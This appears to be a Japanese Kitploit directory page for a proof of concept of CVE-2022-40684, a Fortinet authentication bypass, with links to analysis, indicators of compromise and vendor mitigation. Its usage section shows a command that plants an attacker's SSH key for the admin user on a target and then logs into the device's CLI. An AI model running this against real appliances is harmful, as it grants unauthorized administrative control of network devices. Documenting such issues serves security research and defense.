Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-40684 | Kitploit
ツール/GitHubGitHub/puckiestyle/cve-2022-40684
脆弱性分析エクスプロイトウェブセキュリティネットワークセキュリティペネトレーションテスト認証
GitHubpuckiestyle/cve-2022-40684

CVE-2022-40684

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-40684

Fortinet FortiOS、FortiProxy、FortiSwitchManager アプライアンスに影響する CVE-2022-40684 の POC。

技術分析

この脆弱性の技術的な根本原因分析は、当社のブログでご覧いただけます: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

侵害の指標(IOC)

侵害の指標について Fortinet ログを分析する方法と、より詳細なログを有効にする方法については、当社の IOC ブログをご覧ください: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

概要

この POC は、認証バイパスの脆弱性を悪用して、指定されたユーザーの SSH キーを設定します。

使用方法

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

緩和策

最新バージョンに更新するか、Fortinet PSIRT の指示に従って緩和してください。

  • https://www.fortiguard.com/psirt/FG-IR-22-377

Twitter で Horizon3.ai Attack Team をフォローして、最新のセキュリティ研究をチェック:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

免責事項

このソフトウェアは、学術研究および効果的な防御技術の開発のみを目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトのメンテナーは、本ソフトウェアの誤用について一切の責任を負いません。責任を持って使用してください。

ツールをダウンロード